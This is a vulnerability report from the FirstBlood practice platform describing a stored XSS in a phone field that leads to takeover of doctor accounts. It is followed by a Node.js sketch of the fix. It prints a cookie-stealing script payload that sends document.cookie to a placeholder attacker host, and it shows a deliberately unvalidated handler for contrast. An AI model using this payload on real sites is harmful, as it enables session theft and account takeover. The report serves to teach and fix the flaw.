FirstBlood-#1335 Stored XSS to account takeover of doctors
This issue was discovered on FirstBlood v3

On 2022-12-09, pichik Level 4 reported:



The join event function is vulnerable to XSS in the phone number parameter.

If you visit you can join the event by submitting your name and phone.
The phone parameter has only weak, client-side protection, which checks whether the value is just a number. You can bypass this by intercepting the request with Burp and changing the payload there.
Here is a simple alert payload:

POST /api/hackerback.php HTTP/1.1
Cookie: drps=35187c4f3abda278280e775d6
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36


An attacker can use a payload like this:
"><script> window.location.href="[attacker-id]?"%2Bdocument.cookie;</script>
to redirect doctors to their site and steal their cookies by appending them to the URL.
Cookies are missing the HttpOnly flag, which allows them to be accessed from the script.

To trigger this XSS, doctors just need to visit:
which is the main endpoint for doctors, so after logging in every doctor is affected.



An attacker can take over any doctor that logs in.


There is only a client-side check that the phone parameter is numeric, which can be easily bypassed with a proxy, so adding an additional server-side check should fix this issue.


Endpoint: /api/hackerback.php

Parameter: phone

Payload: "><script> window.location.href="[your-id]?"%2Bdocument.cookie;</script>

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads, but that restriction is enforced only by the browser and is absent from the request an attacker sends directly.
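As an added example, not part of pichik's report or FirstBlood's code: a Node.js sketch of the fix the report recommends, alongside the vulnerable pattern it describes. The real endpoint is PHP, so the handler names, the in-memory store, the rendered row on the doctors' page and the request bodies here are assumptions. The checks themselves are the ones a PHP fix would apply with preg_match and htmlspecialchars: a strict server-side phone pattern, HTML escaping wherever the stored value is rendered, and an HttpOnly session cookie so that document.cookie no longer exposes it.

```javascript
// Added example, not FirstBlood's code. The real endpoint is
// /api/hackerback.php; the function names, the in-memory store and the
// rendered row below are assumptions used to show the checks.

// Server-side phone validation: optional leading '+', then 6 to 15 digits.
// This is the check the browser's type="tel" hint never enforced.
const PHONE_RE = /^\+?[0-9]{6,15}$/;

function isValidPhone(phone) {
  return typeof phone === "string" && PHONE_RE.test(phone);
}

// HTML-escape a value for an element body or a double-quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern from the report: nothing is checked on the server, so a
// proxied request with any string in `phone` is stored as-is.
function joinEventVulnerable(body, store) {
  store.push({ name: body.name, phone: body.phone });
  return { status: 200 };
}

// Hardened handler: the same numeric check, now enforced where the attacker
// cannot skip it. Malformed input is rejected and never reaches the store.
function joinEventHardened(body, store) {
  if (typeof body.name !== "string" || body.name.length === 0 || body.name.length > 100) {
    return { status: 400, error: "invalid name" };
  }
  if (!isValidPhone(body.phone)) {
    return { status: 400, error: "invalid phone" };
  }
  store.push({ name: body.name, phone: body.phone });
  return { status: 200 };
}

// Doctors' page row (assumed attribute context, which the report's leading
// `">` payload targets). Escaping on output is the second, independent
// defence if anything does reach the store.
function renderAttendeeRow(att) {
  return `<tr><td>${escapeHtml(att.name)}</td>` +
    `<td><input type="tel" value="${escapeHtml(att.phone)}"></td></tr>`;
}

// Session cookie with HttpOnly set: document.cookie no longer exposes it,
// which removes the exfiltration path the payload relies on.
function sessionCookieHeader(value) {
  return `drps=${value}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// The report's payload, URL-decoded (%2B -> +). Constructed request body.
const PAYLOAD = '"><script> window.location.href="[attacker-id]?"+document.cookie;</script>';

// Run the same proxied request through both handlers and report what happens.
function demo() {
  const vulnStore = [];
  const safeStore = [];
  const body = { name: "Alice", phone: PAYLOAD };
  const vuln = joinEventVulnerable(body, vulnStore);
  const safe = joinEventHardened(body, safeStore);
  return {
    vulnerableStatus: vuln.status,   // 200: payload is stored
    hardenedStatus: safe.status,     // 400: payload is rejected
    storedUnescaped: vulnStore[0].phone.includes("<script>"),
    renderedSafely: !renderAttendeeRow(vulnStore[0]).includes("<script>"),
  };
}

console.log(demo());
```

The two defences are independent on purpose: validation stops the payload from being stored, and output escaping stops a stored value from executing if validation is ever loosened (for example to accept formatted numbers). The HttpOnly flag does not prevent the XSS itself, but it removes the cookie theft the report chains it into.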